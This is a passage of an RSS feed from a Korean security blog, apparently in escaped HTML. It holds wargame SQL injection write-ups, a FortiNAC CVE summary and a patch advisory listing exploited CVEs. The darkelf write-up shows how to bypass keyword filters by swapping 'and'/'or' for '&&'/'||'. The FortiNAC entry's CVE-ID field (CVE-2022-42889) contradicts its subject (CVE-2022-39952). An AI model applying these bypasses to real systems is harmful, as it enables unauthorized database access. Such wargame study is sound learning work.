this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;550&quot; height=&quot;591&quot; data-origin-width=&quot;582&quot; data-origin-height=&quot;625&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;685&quot; data-origin-height=&quot;442&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/UrGBh/btr0NMVdUMv/MJSy1ajFqEOYX3Cgxe1my1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/UrGBh/btr0NMVdUMv/MJSy1ajFqEOYX3Cgxe1my1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/UrGBh/btr0NMVdUMv/MJSy1ajFqEOYX3Cgxe1my1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FUrGBh%2Fbtr0NMVdUMv%2FMJSy1ajFqEOYX3Cgxe1my1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;680&quot; height=&quot;439&quot; data-origin-width=&quot;685&quot; data-origin-height=&quot;442&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;pw에 확인된 패스워드 값을 입력해 주면 문제를 풀 수 있습니다.&lt;/p&gt;</description>
      <category>Code::War Game/los.rubiya.kr</category>
      <category>Lord of the SQL Injection</category>
      <category>Lord of the SQL Injection orge</category>
      <category>Los</category>
      <category>sql injection</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/278</guid>
      <comments>https://securitycode.tistory.com/278#entry278comment</comments>
      <pubDate>Mon, 27 Feb 2023 19:00:58 +0900</pubDate>
    </item>
    <item>
      <title>[LOS] Lord of the SQL Injection - darkelf</title>
      <link>https://securitycode.tistory.com/277</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&lt;/span&gt;&amp;nbsp;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다.&lt;/b&gt; &lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;728&quot; data-origin-height=&quot;323&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/PzMYp/btr0VKCiLka/9hC6S1kVhtkEzZsTkL0Q5k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/PzMYp/btr0VKCiLka/9hC6S1kVhtkEzZsTkL0Q5k/img.png&quot; data-alt=&quot;Lord of the SQL Injection - darkelf&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/PzMYp/btr0VKCiLka/9hC6S1kVhtkEzZsTkL0Q5k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FPzMYp%2Fbtr0VKCiLka%2F9hC6S1kVhtkEzZsTkL0Q5k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;700&quot; height=&quot;311&quot; data-origin-width=&quot;728&quot; data-origin-height=&quot;323&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Lord of the SQL Injection - darkelf&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;Lord&amp;nbsp;of&amp;nbsp;the&amp;nbsp;SQL&amp;nbsp;Injection&amp;nbsp;-&amp;nbsp;darkelf&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;preg_match&amp;nbsp;:&amp;nbsp;porb&amp;nbsp;_&amp;nbsp;.&amp;nbsp;(&amp;nbsp;)&amp;nbsp;필터링이&amp;nbsp;되어&amp;nbsp;있고&amp;nbsp;i&amp;nbsp;옵션을&amp;nbsp;통하여&amp;nbsp;대소문자를&amp;nbsp;구분하지&amp;nbsp;않음&amp;nbsp;pw='필터링값'이&amp;nbsp;있을&amp;nbsp;경우&amp;nbsp;&quot;No&amp;nbsp;Hack&amp;nbsp;~_~&quot;&amp;nbsp;문구를&amp;nbsp;출력합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;preg_match : or, and 문자가 필터링이 되어 있고 i 옵션을 통하여 대소문자를 구분하지 않음 pw='필터링값'이 있을 경우 &quot;HeHe&quot; 문구를 출력합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;해당 문제도 앞의 문제와 마찬가지로 id값에 'admin'이 있는지 확인하면 간단히 풀리는 문제입니다. 하지만 앞의 문제와는 다르게 or, and 문자열을 필터링하고 있으므로 해당 문자열을 대신할 다른 문자열로 우회를 해주어야 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;bWAPP DB를 통한 예시&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;679&quot; data-origin-height=&quot;279&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/IjpTX/btr0JN1bFFN/uchkZexPkiKITInboWb0CK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/IjpTX/btr0JN1bFFN/uchkZexPkiKITInboWb0CK/img.png&quot; data-alt=&quot;bWAPP DB&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/IjpTX/btr0JN1bFFN/uchkZexPkiKITInboWb0CK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FIjpTX%2Fbtr0JN1bFFN%2FuchkZexPkiKITInboWb0CK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;670&quot; height=&quot;275&quot; data-origin-width=&quot;679&quot; data-origin-height=&quot;279&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bWAPP DB&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;bWAPP의&amp;nbsp;DB를&amp;nbsp;통하여&amp;nbsp;먼저&amp;nbsp;설명을&amp;nbsp;드리도록&amp;nbsp;하겠습니다. &lt;br /&gt;&lt;br /&gt;select&amp;nbsp;login&amp;nbsp;from&amp;nbsp;users; &lt;br /&gt;- bWAPP DB의 users 테이블의 login 컬럼을 출력하였습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;and 문자열 대신 &amp;amp;&amp;amp; 문자열을 사용&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;or 문자열 대신 || 문자열을 사용&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;806&quot; data-origin-height=&quot;436&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bwQJdq/btr0IuOj9U6/YY2i2nSUd6Ca1TJzG5vkTK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bwQJdq/btr0IuOj9U6/YY2i2nSUd6Ca1TJzG5vkTK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bwQJdq/btr0IuOj9U6/YY2i2nSUd6Ca1TJzG5vkTK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbwQJdq%2Fbtr0IuOj9U6%2FYY2i2nSUd6Ca1TJzG5vkTK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;700&quot; height=&quot;379&quot; data-origin-width=&quot;806&quot; data-origin-height=&quot;436&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;Lord of the SQL Injection - darkelf 문제에서도 마찬가지로 and 문자열 대신 &amp;amp;&amp;amp; 문자열을 사용하였고, or 문자열 대신 || 문자열을 사용하였습니다.&lt;/p&gt;</description>
      <category>Code::War Game/los.rubiya.kr</category>
      <category>Lord of the SQL Injection</category>
      <category>Lord of the SQL Injection darkelf</category>
      <category>Los</category>
      <category>sql injection</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/277</guid>
      <comments>https://securitycode.tistory.com/277#entry277comment</comments>
      <pubDate>Mon, 27 Feb 2023 12:15:57 +0900</pubDate>
    </item>
    <item>
      <title>Fortinet FortiNAC (CVE-2022-39952)</title>
      <link>https://securitycode.tistory.com/276</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&lt;/span&gt;&amp;nbsp;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;CVE-ID&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;CVE-2022-42889&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;개요&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;CVE-2022-39952는&amp;nbsp;Fortinet의&amp;nbsp;네트워크&amp;nbsp;접근&amp;nbsp;제어&amp;nbsp;솔루션인&amp;nbsp;FortiNAC의&amp;nbsp;웹&amp;nbsp;서버에&amp;nbsp;있는&amp;nbsp;파일&amp;nbsp;이름&amp;nbsp;또는&amp;nbsp;경로에&amp;nbsp;대한&amp;nbsp;외부&amp;nbsp;제어&amp;nbsp;취약점입니다.&amp;nbsp;인증되지&amp;nbsp;않은&amp;nbsp;공격자가&amp;nbsp;이를&amp;nbsp;악용하여&amp;nbsp;취약한&amp;nbsp;시스템에&amp;nbsp;임의&amp;nbsp;쓰기를&amp;nbsp;수행할&amp;nbsp;수&amp;nbsp;있습니다.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;Horizon3.ai의 공격 팀은 이미 악용에 대해 자세히 설명하는 PoC와 블로그 게시물을 발표했습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;653&quot; data-origin-height=&quot;619&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/beNVaT/btr0jifPA0z/zkWO478jNvzN3UkL9lEc4k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/beNVaT/btr0jifPA0z/zkWO478jNvzN3UkL9lEc4k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/beNVaT/btr0jifPA0z/zkWO478jNvzN3UkL9lEc4k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbeNVaT%2Fbtr0jifPA0z%2FzkWO478jNvzN3UkL9lEc4k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;650&quot; height=&quot;616&quot; data-origin-width=&quot;653&quot; data-origin-height=&quot;619&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;참조&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;a style=&quot;color: #333333;&quot; href=&quot;https://www.fortiguard.com/psirt/FG-IR-22-300&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39952&lt;br /&gt;&lt;/a&gt;&lt;a style=&quot;color: #333333;&quot; href=&quot;https://www.fortiguard.com/psirt/FG-IR-22-300&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.fortiguard.com/psirt/FG-IR-22-300&lt;/a&gt;&lt;a style=&quot;color: #333333;&quot; href=&quot;https://www.fortiguard.com/psirt/FG-IR-22-300&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&lt;br /&gt;&lt;/a&gt;&lt;a style=&quot;color: #333333;&quot; href=&quot;https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;</description>
      <category>Code::Security/취약점</category>
      <category>CVE-2022-39952</category>
      <category>fortinet</category>
      <category>Fortinet FortiNAC</category>
      <category>취약점</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/276</guid>
      <comments>https://securitycode.tistory.com/276#entry276comment</comments>
      <pubDate>Wed, 22 Feb 2023 14:23:35 +0900</pubDate>
    </item>
    <item>
      <title>보안공지 : 최근 해킹 공격에 활용되는 취약점 보안 업데이트 권고</title>
      <link>https://securitycode.tistory.com/275</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #666666;&quot;&gt;□ 개요&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;&amp;nbsp;o 최근 기업에서 운영 중인 서버의 취약점을 악용한 해킹 툴 제작 및 공격이 활발히 발생하고있어, 기업 담당자들의 철저한 사전 보안 점검 및 대비 필요&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;&amp;nbsp;o 취약한 버전의 소프트웨어, 서버를 사용하는 기업 및 사용자는 최신버전으로 업데이트 권고&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: #666666;&quot;&gt;□ 최근 악용되고있는 주요 취약점&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Apache APISIX에서 발생하는 인증 우회 취약점(CVE-2021-45232)[1]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Apache HTTP Server에서 경로 탐색(Path Traversal)으로 인해 발생하는 정보노출 취약점(CVE-2021-42013)[2]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Apache HTTP Server에서 경로 탐색(Path Traversal)으로 인해 발생하는 정보노출 취약점(CVE-2021-41773)[3]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Apache OFBiz에서 발생하는 크로스 사이트 스크립팅(XSS) 취약점(CVE-2020-9496)[4]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Apache OFBiz에서 발생하는 역직렬화 취약점(CVE-2021-26295)[5]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Apache Struts에서 발생하는 원격코드 실행 취약점(CVE-2020-17530)[6]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Apache Struts에서 사용자 입력값 검증 미흡으로 발생하는 원격 코드 실행 취약점(CVE-2021-31805)[7]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Apache Tomcat이 AJP request 메시지를 처리할 때, 메시지에 대한 처리가 미흡하여 발생하는 원격코드실행 취약점(CVE-2020-1938)[8]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Apache Log4j에서 발생하는 원격코드 실행 취약점(CVE-2021-44228)[9]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Atlassian Confluence Server 및 Data Center에서 OGNL 인젝션으로 인해 발생하는 원격코드실행 취약점(CVE-2021-26084)[10]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ BIG-IP에서 iControl REST 인증 미흡으로 인해 발생하는 불충분한 인가 취약점(CVE-2022-1388)[11]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ BIG-IP, BIG-IQ의 iControl REST 인터페이스에서 발생하는 원격 코드 실행 취약점(CVE-2021-22986)[12]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Grafana 소프트웨어에서 경로탐색(Directory Traversal)으로 인해 발생하는 정보노출 취약점(CVE-2021-43798)[13]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Inspur ClusterEngine V4.0에서 발생하는 원격 코드 실행 취약점(CVE-2020-21224)[14]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Oracle WebLogic Server에서 발생하는 원격 코드 실행 취약점(CVE-2021-2109)[15]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ SMBv3 프로토콜이 조작된 패킷을 처리할 때 버퍼오버플로우로 인해 발생하는 원격코드실행 취약점(CVE-2020-0796)[16]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Spring Cloud Gateway에서 발생하는 원격코드 실행 취약점(CVE-2022-22947)[17]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Spring Core에서 발생하는 원격코드실행 취약점(CVE-2022-22965)[18]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ Spring Cloud Function에서 발생하는 원격코드실행 취약점(CVE-2022-22963)[18]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ VMware vCenter Server 원격 코드 실행 취약점(CVE-2021-21972)[19]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ VMware vCenter Server 에서 발생하는 파일 업로드 취약점(CVE-2021-22005)[20]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ VMware Workspace ONE Access와 Identity Manager에서 발생하는 원격 코드 실행 취약점(CVE-2022-22954)[21]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ WebLogic Server에서 안전하지 않은 역직렬화로 인해 발생하는 인증 우회 및 원격코드 실행 취약점(CVE-2019-2725)[22]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;ㅇ WSO2에서 발생하는 원격코드 실행 취약점(CVE-2022-29464)[23]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: #666666;&quot;&gt;□ 해결 방안&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;&amp;nbsp;o 취약점별 참고사이트[1]~[23]에 명시되어 있는 내용을 참조하여 업데이트 수행&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[참고사이트]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[1]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45232&quot;&gt;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45232&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[2]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36279&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36279&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[3]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36277&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36277&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[4]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9496&quot;&gt;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9496&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[5]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295&quot;&gt;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[6]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17530&quot;&gt;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17530&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[7]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=66650&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=66650&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[8]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35292&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35292&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[9]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36389&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36389&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[10]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36221&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36221&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[11]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=66689&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=66689&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[12]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35935&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35935&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[13]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36386&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36386&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[14]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21224&quot;&gt;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21224&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[15]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35875&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35875&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[16]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35297&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35297&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[17]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947&quot;&gt;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[18]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=66592&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=66592&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[19]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35925&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35925&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[20]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36255&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36255&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[21]&amp;nbsp;&lt;a style=&quot;color: 